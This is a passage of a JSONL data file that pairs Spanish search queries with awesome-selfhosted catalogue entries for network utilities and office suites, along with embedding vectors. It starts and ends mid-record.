0.05156, -0.02027, -0.03245, -0.04042, 0.02471, -0.0834, 0.00899, -0.02428, -0.06408, 0.01649, 0.0195, 0.06816, 2e-05, 0.06481, 0.00845]} +{"tipo": "pregunta", "herramienta": "Network Utilities", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Network Utilities", "tema": "network utilities", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Network Utilities: beelzebub β€” Honeypot framework designed to provide a highly secure environment for detecting and analyzing cyber attacks [⚠, MIT, Docker/K8S/Go]. Canary Tokens β€” Generates lightweight, embedded honeypot triggers called canary tokens for detecting unauthorized access [BSD-3-Clause, Docker/Python]. MyIP β€” All in one IP Toolbox. Easy to check what's your IPs, IP geolocation, check for DNS leaks, examine WebRTC connections, speed test, ping test, MTR test, check website availability and more [⚠, MIT, Nodejs/Docker]. MySpeed β€” Speed test analysis software that shows your internet speed for up to 30 days [MIT, Docker/Nodejs]. NetAlertX β€” Network intruder and presence detector. Scans for devices connected to your network and alerts you if new and unknown devices are found [GPL-3.0, Docker]. PlugNPiN β€” Automatically scrapes containers with specific labels and creates local DNS/CNAME entries in Pi-Hole/AdGuard Home and proxy hosts in Nginx Proxy Manager [GPL-3.0, Docker].", "indexar": "que programa sirve para detectar ataques cibernΓ©ticos de forma segura?", "v": [-0.20142, -0.04447, -0.20556, -0.20141, 0.11926, -0.099, -0.00985, -0.03967, -0.03798, -0.07478, 0.00257, 0.04632, -0.07254, -0.1044, 0.15696, 0.0202, 0.07361, -0.07512, 0.12838, -0.03767, 0.07108, 0.00656, 0.0731, -0.07685, -0.07262, 0.03668, -0.05432, 0.04696, 0.01779, 0.04165, 0.06074, -0.01496, 0.08734, -0.02283, -0.04992, 0.03581, -0.07103, -0.04845, 0.06484, 0.13144, 0.06226, 0.00203, -0.07195, -0.10766, 0.10614, 0.0495, 0.03276, -0.02134, 0.07147, -0.06998, 0.01264, 0.05193, -0.13303, -0.06947, -0.03366, -0.10171, -0.0515, -0.04653, 0.10116, -0.0391, -0.09318, -0.00162, 0.02958, 0.01236, 0.12346, -0.07394, 0.05382, -0.03742, -0.12907, -0.01556, 0.03396, -0.0315, 0.00256, 0.05866, 0.01361, -0.02252, 0.03268, 0.0366, 0.16864, -0.00421, -0.03819, 0.07098, 0.00575, 0.06082, -0.14632, -0.04887, 0.03051, -0.0368, -0.08058, -0.1126, 0.05338, 0.05966, -0.01317, 0.03798, 0.00842, -0.02674, 0.08472, -0.04056, -0.04896, 0.03082, 0.03978, -0.11733, -0.04053, 0.10786, -0.06583, 0.02718, -0.02391, -0.01174, -0.01918, -0.11095, -0.0969, -0.03811, -0.06382, -0.11411, -0.01813, 0.0334, 0.00665, 0.00771, 0.08914, -0.02351, -0.11441, 0.0185, -0.08302, 0.03916, 0.0848, 0.0028, -0.0538, 0.03153, -0.05456, 0.00233, 0.02061, 0.04679, 0.00636, 0.00775, -0.05315, -0.01434, -0.01617, -0.10916, -0.02377, 0.0237, 0.04469, 0.17035, 0.03674, 0.00137, 0.0586, 0.03398, 0.00789, -0.0473, -0.0464, 0.03077, 0.07766, 0.06579, -0.02304, 0.06908, -0.10505, -0.01149, -0.00841, -0.05584, -0.03884, 0.09385, 0.00948, 0.027, -0.01077, -0.01108, 0.03989, -0.03385, 0.05099, 0.00459, 0.14357, 0.12023, -0.00166, 0.06597, 0.06787, -0.09807, -0.05727, 0.01129, -0.03482, -0.05274, 0.04548, -0.05149, -0.07665, -0.0243, 0.01305, 0.01729, -0.04684, -0.05559, -0.00089, 0.03141, 0.02431, 0.03069, 0.052, -0.01018, -0.03038, 0.03927, 0.00614, -0.06372, -0.00915, -0.00665, 0.05505, -0.02835, -0.05425, -0.06896, -0.02697, -0.01461, 0.02844, 0.09622, -0.01533, -0.0301, 0.04089, 0.07033, 0.052, -0.066, 0.08181, 0.00415, -0.07446, -0.04464, 0.01519, 0.04015, 0.01074, 0.04574, -0.03522, -0.0199, 0.00205, 0.0512, 0.00874, -0.04891, -0.02666, -0.01507, 0.08285, 0.00934, 0.01413, -0.04583, -0.01696, -0.01894, 0.0244, -0.067, 0.00227, -0.03024, -0.05432, -0.05693, -0.02095, 0.05338, -0.01223, -0.08193, -0.02608, -0.02598, -0.06985, 0.00419, -0.01106, -0.03385, -0.03673, 0.04027, 0.05714, -0.02681, 0.03051, -4e-05]} +{"tipo": "pregunta", "herramienta": "Network Utilities", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Network Utilities", "tema": "network utilities", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Network Utilities: beelzebub β€” Honeypot framework designed to provide a highly secure environment for detecting and analyzing cyber attacks [⚠, MIT, Docker/K8S/Go]. Canary Tokens β€” Generates lightweight, embedded honeypot triggers called canary tokens for detecting unauthorized access [BSD-3-Clause, Docker/Python]. MyIP β€” All in one IP Toolbox. Easy to check what's your IPs, IP geolocation, check for DNS leaks, examine WebRTC connections, speed test, ping test, MTR test, check website availability and more [⚠, MIT, Nodejs/Docker]. MySpeed β€” Speed test analysis software that shows your internet speed for up to 30 days [MIT, Docker/Nodejs]. NetAlertX β€” Network intruder and presence detector. Scans for devices connected to your network and alerts you if new and unknown devices are found [GPL-3.0, Docker]. PlugNPiN β€” Automatically scrapes containers with specific labels and creates local DNS/CNAME entries in Pi-Hole/AdGuard Home and proxy hosts in Nginx Proxy Manager [GPL-3.0, Docker].", "indexar": "con quΓ© puedo generar desencadenantes ligeros para vigilar el acceso no autorizado?", "v": [-0.03843, 0.05756, -0.22021, 0.083, 0.0523, 0.08071, 0.02986, 0.0393, -0.16305, -0.17462, 0.02422, -0.11069, -0.04297, -0.08749, 0.19114, 0.16185, 0.00878, -0.03948, -0.00442, 0.09143, -0.06534, -0.03659, 0.05743, -0.06402, 0.05368, -0.10149, 0.01713, -0.04198, 0.07426, 0.04721, -0.00379, 0.08045, -0.069, 0.09203, 0.0323, 0.06192, -0.04643, 0.12263, 0.0518, 0.04804, 0.08529, 0.03654, -0.04289, -0.19415, 0.08152, -0.03282, -0.00436, 0.02672, -0.00537, -0.05417, 0.00764, 0.00097, -0.06449, -0.09494, -0.07375, 0.09187, 0.16287, 0.00696, 0.10534, -0.01373, -0.01739, 0.0344, 0.08049, 0.02939, -0.01736, 0.0147, 0.0482, 0.08329, -0.01284, -0.01405, -0.10272, -0.02101, 0.08374, 0.02718, -0.0663, -0.03904, -0.11676, -0.01635, 0.09097, 0.08673, 0.01472, 0.03176, -0.00977, -0.07465, -0.03181, -0.08633, 0.03079, -0.05231, -0.10764, -0.01419, 0.11313, 0.04087, 0.06298, -0.00022, 0.01314, -0.00896, -0.0492, 0.05091, -0.11726, 0.01853, 0.02484, -0.05033, -0.06853, 0.07943, 0.00693, -0.0101, 0.05142, -0.05479, -0.07001, -0.07026, -0.03864, -0.03813, -0.07876, -0.05076, -0.00032, 0.08026, -0.07567, -0.06733, 0.03655, -0.00626, 0.02191, -0.11958, -0.04938, -0.01307, 0.0195, -0.00187, -0.02925, 0.06624, -0.01509, -0.0185, 0.0252, -0.063, -0.08155, -0.00874, -0.04027, -0.02172, -0.07524, -0.04601, -0.02939, 0.08947, 0.07255, 0.04052, 0.01577, 0.03981, 0.01783, -0.00077, -0.06302, -0.01461, -0.1064, -0.07811, 0.04597, -0.03502, -0.03564, 0.06725, -0.04407, 0.07351, -0.03367, -0.08223, 0.03479, 0.06212, 0.03211, 0.10892, -0.04408, 0.0236, -0.00783, 0.03158, -0.01812, -0.08553, 0.00032, 0.08725, -0.07725, 0.0247, -0.04385, -0.05825, 0.0903, -0.09223, -0.0564, -0.10918, 0.00587, -0.04682, -0.00471, 0.00412, -0.08676, -0.00237, -0.03243, -0.00214, -0.03896, -0.00159, 0.09551, 0.10722, -0.01136, 0.08243, -0.01126, -0.01244, 0.0596, -0.0506, 0.02724, -0.03811, -0.00735, -0.02475, 0.04265, 0.00081, -0.04578, -0.05325, 0.06278, -0.00078, -0.01573, 0.12355, -0.06297, 0.02529, 0.00877, -0.06264, 0.07893, -0.05179, -0.0502, 0.04115, -0.0074, 0.02133, 0.01636, 0.00653, 0.03979, 0.01187, 0.05617, 0.02623, 0.01463, -0.06388, -0.02569, 0.01577, 0.06035, 0.02203, -0.06221, -0.03524, -0.09488, -0.01241, 0.03785, -0.04426, -0.09282, -0.0141, -0.03003, 0.00762, 0.03988, 0.02363, -0.02059, -0.01383, 0.04498, -0.05105, -0.03872, 0.06632, -0.07489, -0.07484, -0.01573, 0.02114, 0.06776, -0.03756, 0.07029, -0.04005]} +{"tipo": "pregunta", "herramienta": "Network Utilities", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Network Utilities", "tema": "network utilities", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Network Utilities: beelzebub β€” Honeypot framework designed to provide a highly secure environment for detecting and analyzing cyber attacks [⚠, MIT, Docker/K8S/Go]. Canary Tokens β€” Generates lightweight, embedded honeypot triggers called canary tokens for detecting unauthorized access [BSD-3-Clause, Docker/Python]. MyIP β€” All in one IP Toolbox. Easy to check what's your IPs, IP geolocation, check for DNS leaks, examine WebRTC connections, speed test, ping test, MTR test, check website availability and more [⚠, MIT, Nodejs/Docker]. MySpeed β€” Speed test analysis software that shows your internet speed for up to 30 days [MIT, Docker/Nodejs]. NetAlertX β€” Network intruder and presence detector. Scans for devices connected to your network and alerts you if new and unknown devices are found [GPL-3.0, Docker]. PlugNPiN β€” Automatically scrapes containers with specific labels and creates local DNS/CNAME entries in Pi-Hole/AdGuard Home and proxy hosts in Nginx Proxy Manager [GPL-3.0, Docker].", "indexar": "quΓ© herramienta me permite ver mi IP y detectar fugas DNS fΓ‘cilmente?", "v": [-0.00965, 0.06859, -0.23679, -0.16281, 0.10008, 0.01209, -0.10156, -0.00326, -0.14558, 0.05548, 0.06949, -0.00939, -0.15112, -0.16811, -0.00761, 0.0031, 0.04859, -0.06697, 0.03315, -0.12741, -0.16792, -0.02428, -0.15511, -0.07045, -0.09048, -0.02015, -0.02716, -0.01355, -0.14248, -0.10536, -0.01444, -0.05653, 0.04552, 0.04664, -0.19014, -0.07222, -0.03164, 0.0435, 0.0768, -0.00155, 0.05731, 0.08709, -0.09619, -0.04036, 0.04339, -0.08659, -0.07275, -0.0993, 0.0414, -0.07327, -0.05774, -0.12338, -0.1239, -0.01536, -0.13928, -0.05071, 0.16656, -0.07892, 0.09234, -0.07344, -0.14225, -7e-05, -0.00452, -0.02426, 0.04199, -0.10525, -0.00345, -0.08267, -0.09947, -0.03531, 0.06099, -0.00737, 0.02033, 0.05728, 0.04795, -0.00473, 0.04398, -0.06006, 0.14032, 0.01963, 0.08136, -0.01365, -0.0843, 0.0863, -0.08391, -0.03532, 0.00431, -0.12173, 0.02523, -0.10414, 0.02083, 0.07487, 0.03368, 0.03928, 0.04907, 0.06257, 0.13342, 0.04192, -0.05495, 0.01175, 0.01933, 0.04917, -0.09982, 0.11004, 0.01872, -0.00804, -0.01686, -0.0049, -0.03885, -0.0424, -0.05042, 0.05068, -0.02714, -0.09276, -0.00159, 0.0671, 0.04987, -0.05088, -0.04201, 0.03695, -0.0561, -0.09305, -0.04828, -0.03089, 0.01311, -0.01084, -0.05703, 0.00043, 0.00704, -0.08177, -0.00774, -0.05002, -0.09295, -0.0493, 0.05196, 0.04382, 0.00517, -0.09097, -0.01567, -0.02175, -0.01804, -0.01143, -0.01645, -0.0358, 0.08327, -0.04475, 0.00515, -0.07955, -0.04726, 0.00783, -0.0371, -0.02584, -0.00557, -0.01402, -0.08554, 0.02792, 0.01261, -0.01374, -0.08365, 0.04513, -0.03237, -0.0282, 0.085, -0.02392, 0.03084, 0.00603, 0.00403, 0.00279, 0.11486, 0.01323, 0.00805, 0.05321, -0.04403, -0.02386, 0.00873, -0.05232, 0.02549, -0.03393, 0.02233, -0.06678, -0.03781, -0.03291, 0.01022, -0.01977, 0.01947, -0.02171, 0.03243, -0.00906, -0.00105, 0.00518, 0.0767, 0.03339, -0.05028, -0.01217, -0.00917, -0.00804, -0.00515, -0.17135, 0.03655, -0.02353, -0.05754, -0.03438, 0.04567, -0.05265, 0.00708, 0.01615, -0.01691, -0.00556, -0.02068, -0.00672, 0.05179, 0.00484, 0.03931, -0.06684, -0.05528, 0.04827, 0.00899, 0.01312, -0.00158, -0.03461, -0.00829, 0.00424, 0.0486, -0.00307, -0.00986, -0.01544, -0.01584, 0.00239, 0.02384, 0.00031, 0.02168, -0.00481, -0.04186, -0.02771, 0.02318, -0.06278, 0.02587, -0.03645, -0.01683, -0.01594, 0.01005, 0.01655, 0.00216, -0.02964, 0.02119, -0.03121, -0.02507, 0.00946, -0.02263, -0.06887, -0.06006, -0.00409, 0.06835, -0.03471, 0.04383, -0.00107]} +{"tipo": "pregunta", "herramienta": "Network Utilities", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Network Utilities", "tema": "network utilities", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Network Utilities: Speed Test by OpenSpeedTestβ„’ β€” Free & Open-Source HTML5 Network Performance Estimation Tool [MIT, Docker]. Speedtest Tracker β€” Monitor the performance and uptime of your internet connection [MIT, Docker/K8S]. Upsnap β€” A simple Wake on LAN (WOL) dashboard app. Wake up devices on your network and see current status [MIT, Go/Docker]. Wakupator β€” Wake On LAN Machine Manager based on network traffic [MIT, C]. WatchYourLAN β€” Lightweight network IP scanner with notifications, history, export to Grafana [MIT, Docker/Go/deb]. whois β€” WHOIS/RDAP query API for domains, IP addresses, CIDR prefixes and ASNs, with unified JSON output, caching, API key authentication, batch queries and MCP support for AI assistants [MIT, Go/Docker].", "indexar": "que herramienta de red me sirve para medir la velocidad de mi conexiΓ³n", "v": [0.04229, 0.0297, -0.16806, -0.18081, -0.01083, 0.0386, -0.27251, 0.01036, 0.02583, -0.11024, -0.05369, -0.05228, 0.01976, -0.17024, 0.18667, 0.1089, -0.0099, -0.03342, -0.01924, -0.08537, 0.1422, -0.03521, -0.06666, -0.08933, -0.00408, 0.09658, 0.10801, 0.01259, -0.17967, -0.03995, -0.03605, 0.06948, 0.03117, -0.00122, -0.15702, -0.07353, -0.01009, 0.11752, -0.01921, -0.00674, -0.11643, 0.07012, -0.02711, -0.00493, 0.17077, 0.00528, -0.03675, 0.03337, -0.06697, 0.09143, -0.0154, -0.10194, -0.08056, -0.09432, -0.11843, -0.06127, 0.11999, -0.04227, -0.0511, -0.10251, -0.06708, -0.09067, -0.06292, -0.0133, 0.03308, -0.05729, -0.0061, -0.10924, -0.14652, 0.06696, 0.02569, 0.0257, -0.03698, -0.05725, 0.0128, 0.01342, 0.02858, -0.02879, 0.06394, -0.03047, 0.05493, 0.03028, -0.11648, -0.00204, 0.0315, -0.04753, 0.10646, -0.09248, -0.00309, 0.02803, -0.01554, -0.00235, 0.0419, -0.02232, -0.00869, -0.03064, 0.01966, -0.05058, 0.02811, -0.01327, 0.10963, 0.00631, -0.10946, 0.01416, -0.00037, 0.02431, 0.01604, 0.01567, 0.01096, 0.01227, 0.17101, 0.035, 0.01113, -0.02243, -0.05812, 0.03151, -0.02903, -0.06182, -0.09236, -0.05799, -0.02847, 0.03571, -0.08765, -0.06668, -0.06287, -0.03789, -0.05207, -0.00297, 0.00474, -0.03685, 0.04547, 0.03048, -0.03757, -0.08401, -0.01388, 0.03859, -0.02207, -0.18933, 0.032, -0.05126, 0.02647, -0.01121, -0.1051, -0.08916, -0.02661, 0.00343, 0.05356, -0.0078, -0.04893, 0.03152, -0.03732, -0.09281, -0.03698, -0.0339, -0.02159, 0.0089, 0.00034, 0.01923, -0.07319, 0.02712, -0.01272, -0.03892, 0.02858, -0.00664, 0.02504, -0.04509, 0.04339, 0.03448, 0.09033, 0.00507, -0.01647, -0.0448, -0.01656, -0.06569, 0.02196, -0.03189, -0.06537, -0.02616, -0.02848, -0.06175, -0.00249, -0.03435, -0.05296, -0.0554, -0.00862, -0.01418, -0.02192, -0.01628, 0.03098, 0.03066, -0.00362, 0.00625, 0.08114, -0.02199, 0.03547, 0.0212, 0.013, -0.04783, 0.05967, -0.01353, -0.047, -0.05678, -0.03812, 0.0097, 0.03417, 0.0928, 0.03591, 0.04582, -0.01767, 0.03433, 0.01467, 0.02533, 0.11216, 0.02284, -0.00481, 0.00985, 0.10334, 0.00245, 0.01991, -0.03301, 0.03113, 0.00148, -0.00971, 0.04114, -0.01582, 0.02855, 0.01168, -0.03485, -0.00491, -0.02754, 0.02157, -0.03043, -0.03184, -0.03213, 0.0075, -0.10122, 0.02818, -0.03767, -0.05293, -0.01714, -0.00343, 0.04746, 0.00266, -0.03003, 0.0175, 0.02652, -0.03826, -0.05862, -0.01893, -0.0779, -0.0272, 0.00068, 0.07941, -0.0443, 0.033, 0.00503]} +{"tipo": "pregunta", "herramienta": "Network Utilities", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Network Utilities", "tema": "network utilities", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Network Utilities: Speed Test by OpenSpeedTestβ„’ β€” Free & Open-Source HTML5 Network Performance Estimation Tool [MIT, Docker]. Speedtest Tracker β€” Monitor the performance and uptime of your internet connection [MIT, Docker/K8S]. Upsnap β€” A simple Wake on LAN (WOL) dashboard app. Wake up devices on your network and see current status [MIT, Go/Docker]. Wakupator β€” Wake On LAN Machine Manager based on network traffic [MIT, C]. WatchYourLAN β€” Lightweight network IP scanner with notifications, history, export to Grafana [MIT, Docker/Go/deb]. whois β€” WHOIS/RDAP query API for domains, IP addresses, CIDR prefixes and ASNs, with unified JSON output, caching, API key authentication, batch queries and MCP support for AI assistants [MIT, Go/Docker].", "indexar": "cual es un programa ligero para ver quΓ© dispositivos hay en mi red y sus IPs", "v": [-0.06398, 0.0452, -0.11901, -0.04359, 0.12997, -0.14718, -0.06379, -0.03976, -0.11972, -0.07197, 0.03751, -0.14843, -0.03464, -0.14805, 0.06724, 0.02225, 0.01292, -0.05304, 0.12018, -0.15445, -0.06921, 0.11983, -0.12538, -0.01013, -0.03788, 0.19146, 0.09383, 0.06425, -0.10725, -0.09184, -0.09926, -0.03907, 0.01522, -0.05861, -0.19301, -0.04133, 0.12733, 0.14668, -0.02955, 0.07249, 0.04037, -0.01658, 0.03121, -0.02855, 0.09699, -0.05055, 0.09745, -0.05075, -0.01255, -0.00499, -0.12936, 0.03024, 0.00238, -0.02867, -0.05946, -0.02524, -0.0274, -0.11576, -0.01518, 0.03636, -0.0604, 0.02135, -0.05874, -0.06069, 0.02906, -0.08857, -0.0882, 0.05935, -0.03576, -0.0333, 0.11532, 0.00389, -0.04128, 0.08116, 0.03026, 0.1455, -0.1027, -0.09134, 0.08261, -0.02317, 0.0522, 0.07769, -0.03439, 0.05283, -0.06336, -0.04436, 0.08163, -0.09356, -0.00349, -0.03263, 0.02388, 0.05843, 0.03185, 0.03476, 0.03469, -0.03592, 0.11362, 0.10978, -0.00028, 0.03746, 0.04241, 0.01667, -0.16488, 0.08981, -0.04471, 0.0857, 0.06151, 0.02233, 0.03452, 0.00508, -0.03276, -0.04422, -0.00085, -0.02647, 0.01241, 0.01619, 0.03095, -0.04598, 0.03434, -0.06362, -0.07343, 0.03297, -0.00634, -0.02216, 0.14392, 0.03137, -0.06857, 0.05726, 0.00184, 0.05272, 0.04953, -0.05555, -0.00066, -0.0944, -0.0028, -0.02533, -0.02716, -0.06042, 0.00331, 0.04112, 0.07727, 0.00962, -0.05283, -0.01233, 0.06314, -0.00213, 0.02102, -0.02278, -0.02209, 0.04265, -0.02578, 0.01023, -0.02191, 0.01245, -0.09864, 0.07611, 0.02658, -0.02909, -0.057, 0.05634, -0.07445, -0.00845, 0.02943, -0.05755, 0.04236, -0.00323, -0.04714, 0.0389, 0.12672, 0.01725, -0.05047, 0.0446, -0.04472, -0.02288, -0.02192, -0.06535, -0.00492, -0.02652, 0.0428, -0.06635, -0.04127, 0.07341, 0.06124, 0.03442, 0.02755, -0.03841, -0.01586, 0.02703, 0.01904, -0.02677, 0.00292, 0.00723, 0.00763, 0.04786, 0.0776, -0.01213, -0.04073, -0.07379, -0.00928, -0.03514, -0.08882, -0.01925, -0.01596, -0.00064, 0.04525, 0.04956, 0.02679, 0.0157, 0.02248, 0.12293, -0.00603, 0.01078, 0.05041, 0.00616, -0.09583, 0.03672, 0.02223, 0.09577, 0.04575, 0.01655, 0.09178, -0.02839, -0.00684, 0.05954, -0.06042, -0.00431, -0.00981, 0.00478, -0.00565, -0.04003, -0.01867, -0.05969, -0.03466, -0.03833, -0.00035, 0.01752, 0.03891, -0.01375, -0.00738, -0.04462, -0.02655, 0.07661, 0.03458, -0.08031, -0.02005, 0.04004, -0.08182, 0.02249, -0.04011, -0.06164, -0.02511, 0.04665, 0.04918, -0.06902, 0.02585, 0.06189]} +{"tipo": "pregunta", "herramienta": "Network Utilities", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Network Utilities", "tema": "network utilities", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Network Utilities: Speed Test by OpenSpeedTestβ„’ β€” Free & Open-Source HTML5 Network Performance Estimation Tool [MIT, Docker]. Speedtest Tracker β€” Monitor the performance and uptime of your internet connection [MIT, Docker/K8S]. Upsnap β€” A simple Wake on LAN (WOL) dashboard app. Wake up devices on your network and see current status [MIT, Go/Docker]. Wakupator β€” Wake On LAN Machine Manager based on network traffic [MIT, C]. WatchYourLAN β€” Lightweight network IP scanner with notifications, history, export to Grafana [MIT, Docker/Go/deb]. whois β€” WHOIS/RDAP query API for domains, IP addresses, CIDR prefixes and ASNs, with unified JSON output, caching, API key authentication, batch queries and MCP support for AI assistants [MIT, Go/Docker].", "indexar": "que software puedo usar para activar mis dispositivos dormidos desde lejos", "v": [0.08542, 0.11051, -0.21441, -0.10202, -0.05321, 0.06308, -0.13121, -0.00936, -0.06627, -0.07428, -0.10756, -0.15753, -0.01078, -0.04422, 0.03627, -0.13547, -0.02265, 0.04593, -0.021, 0.00221, -0.02327, -0.08817, -0.0722, -0.03817, 0.03032, 0.04902, 0.06318, 0.00782, -0.20583, -0.08926, -0.04853, -0.04463, 0.1305, -0.10276, -0.09296, -0.04444, 0.00626, 0.04467, 0.04126, 0.04204, 0.07592, 0.02333, 0.00553, -0.02146, 0.07812, -0.01088, -0.00201, -0.12872, -0.03253, 0.04639, -0.02931, -0.02191, -0.06656, -0.04361, 0.03207, -0.0839, 0.20212, -0.07066, 0.01863, 0.01815, 0.00947, 0.03608, 0.03562, 0.03815, 0.08569, -0.13106, -0.00159, 0.09711, -0.10769, 0.03993, -0.00165, 0.12863, -0.0144, 0.02383, 0.08519, 0.0535, -0.11542, -0.08464, 0.0331, 0.00277, 0.00063, -0.02524, -0.03145, -0.03489, -0.10848, -0.06609, 0.15147, 0.01756, -0.00586, -0.07836, 0.00243, 0.05448, -0.02052, 0.01565, 0.04245, 0.0122, 0.08672, 0.06928, 0.06311, 0.07203, 0.07115, -0.01085, 0.00332, 0.12036, -0.06474, -0.05453, 0.00858, -0.06258, 0.00599, -0.11045, -0.00992, -0.033, -0.04444, -0.07874, -0.03866, 0.05006, -0.01735, -0.15463, 0.07208, -0.12012, 0.04619, -0.02624, 0.01871, -0.01407, 0.09683, 0.00064, -0.01915, 0.03734, 0.05238, 0.08423, -0.00929, -0.05558, -0.00352, -0.01489, -0.05605, 0.06261, -0.00764, 0.03547, 0.0563, 0.04313, 0.03865, 0.12442, -0.08498, -0.04255, 0.08545, 0.09998, -0.02137, -0.01474, -0.03, 0.02466, 0.03599, -0.01538, 0.03842, -0.00972, -0.0293, 0.05077, 0.0503, -0.03096, -0.02733, 0.08326, -0.06877, -0.01121, -0.07274, -0.01885, 0.00529, -0.08047, -0.02502, -0.06249, 0.0045, 0.11684, -0.06381, 0.03918, 0.01406, -0.0943, 0.00585, -0.0274, -0.01922, 0.08263, -0.01172, -0.10449, -0.09642, -0.00148, 0.02596, -0.04111, 0.07717, 0.06727, -0.02531, -0.00425, -0.07741, -0.03467, -0.0129, 0.03811, 0.04891, 0.02719, 0.05286, -0.06094, -0.02705, 0.0016, 0.06501, -0.02492, -0.03419, 0.06725, -0.02289, -0.05675, 0.07894, 0.00398, 0.00375, 0.1071, -0.00109, 0.03916, -0.0265, -0.00755, 0.05391, -0.00332, -0.04126, -0.0214, -0.0252, 0.00225, -0.03098, -0.00758, -0.03283, -0.00121, 0.01736, 0.04195, 0.01294, 0.07688, 0.00245, 0.06363, 0.00694, -0.02091, 0.01188, -0.01952, -0.03763, -0.04853, -0.00095, 0.02267, -0.02235, -0.00218, -0.04318, 0.0086, 0.00133, 0.05793, 0.03338, -0.08969, -0.09521, -0.04053, -0.08051, -0.06878, -0.02743, -0.03493, -0.0456, 0.05718, 0.11496, -0.06732, 0.01353, 0.00334]} +{"tipo": "pregunta", "herramienta": "Office Suites", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Office Suites", "tema": "office suites", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Office Suites: Collabora Online Development Edition β€” Collabora Online Development Edition (CODE) is a powerful LibreOffice-based online office that supports all major document, spreadsheet and presentation file formats, which you can integrate in your own infrastructure [MPL-2.0, C++]. CryptPad β€” Collaboration suite built to enable collaboration, synchronizing changes to documents in real time [AGPL-3.0, Nodejs/Docker]. Digislides β€” Create multimedia presentations in a quick and easy way. (documentation in French) [AGPL-3.0, Nodejs/PHP]. Etherpad β€” Highly customizable online editor providing collaborative editing in real-time [Apache-2.0, Nodejs/Docker]. Grist β€” Next-generation spreadsheet with relational structure, formula-based access control, and a portable, self-contained format (alternative to Airtable) [Apache-2.0, Nodejs/Python/Docker]. ONLYOFFICE β€” Office suite that enables you to manage documents, projects, team and customer relations in one place [AGPL-3.0, Nodejs/Docker].", "indexar": "ΒΏcon quΓ© puedo montar un software de oficina en lΓ­nea?", "v": [-0.10078, 0.0516, -0.15868, -0.08328, -0.09671, -0.15119, -0.02245, -0.0519, -0.25558, -0.15309, -0.10714, -0.091, 0.17495, -0.04993, 0.01235, 0.07526, 0.10181, -0.13854, 0.01692, -0.02, -0.08144, -0.02832, -0.0347, -0.05678, 0.02529, -0.01864, 0.07243, -0.13504, -0.12325, 0.06353, 0.06979, 0.06638, 0.16551, 0.05782, -0.08043, 0.0219, -0.03851, 0.06253, 0.16155, -0.02331, 0.00976, 0.01533, -0.01661, 0.04719, 0.08923, -0.00715, 0.03741, 0.04751, -0.0068, -0.012, -0.05933, -0.13508, 0.02809, 0.00725, -0.02905, -0.12292, 0.0876, 0.01236, 0.17561, -0.01246, -0.01021, 0.08104, -0.0601, 0.02053, 0.01442, 0.06298, -0.00067, -0.13426, -0.09213, -0.02935, -0.02994, -0.03438, 0.03185, -0.05547, -0.0078, 0.01928, -0.06994, -0.0013, 0.00265, 0.03219, 0.04572, 0.11543, -0.04174, 0.10062, -0.07246, -0.11562, 0.01032, -0.05807, 0.00336, 0.00823, 0.00689, 0.09589, -0.06305, -0.00632, -0.0174, -0.05285, 0.02953, 0.03129, 0.02477, 0.06507, -0.09772, -0.01575, -0.07588, 0.12385, -0.08192, -0.01929, 0.01692, -0.03178, -0.04108, -0.04888, 0.03081, 0.05488, -0.05032, 0.06243, -0.07768, -0.12919, 0.04843, 0.01503, -0.01442, -0.06921, 0.02502, 0.10502, 0.04247, -0.00216, 0.01093, -0.04678, 0.0681, 0.16327, -0.10764, -0.04091, -0.03271, -0.05505, -0.05661, -0.05706, 0.00599, 0.05631, -0.00183, -0.05404, 0.02105, -0.0796, 0.06442, -0.0084, -0.09331, -0.01477, 0.05132, 0.01444, 0.02705, -0.12397, -0.07541, -0.05476, 0.08953, 0.07717, 0.00701, 0.03847, -0.08096, 0.01677, 0.0548, 0.00713, 0.01343, 0.04082, -0.0384, 0.03906, -0.00991, -0.01364, 0.0013, -0.02858, -0.07863, 0.04325, 0.0144, 0.0432, -0.0163, 0.05098, 0.06844, -0.11266, 0.01501, -0.01389, -0.03359, 0.01781, 0.02941, -0.02378, -0.08421, 0.0475, 0.04127, -0.01227, -0.03639, 0.03172, 0.02282, -0.04829, -0.03075, 0.0675, 0.01295, -0.00118, -0.02522, -0.06165, 0.03763, -0.01279, 0.00499, 0.03926, 0.06411, -0.07455, -0.075, -0.03805, -0.02341, 0.02389, 0.05051, 0.01951, -0.02353, 0.06899, -0.01761, 0.06723, 0.0232, -0.05576, 0.07075, -0.00191, -0.00042, -0.03458, 0.01769, -0.02617, -9e-05, 0.04444, 0.01049, -0.0188, 0.02218, 0.02076, 0.00488, 0.01218, -0.00939, 0.0428, 0.02222, 0.0501, 0.01893, 0.00552, -0.01235, -0.05252, 0.01364, -0.00781, 0.07326, 0.02764, -0.03372, -0.044, -0.01546, 0.10462, 0.01956, -0.03888, -0.01819, -0.01938, -0.03736, -0.00072, -0.03515, -0.01002, -0.05923, -0.00643, -0.01719, -0.00736, -0.03335, -0.01674]} +{"tipo": "pregunta", "herramienta": "Office Suites", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Office Suites", "tema": "office suites", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Office Suites: Collabora Online Development Edition β€” Collabora Online Development Edition (CODE) is a powerful LibreOffice-based online office that supports all major document, spreadsheet and presentation file formats, which you can integrate in your own infrastructure [MPL-2.0, C++]. CryptPad β€” 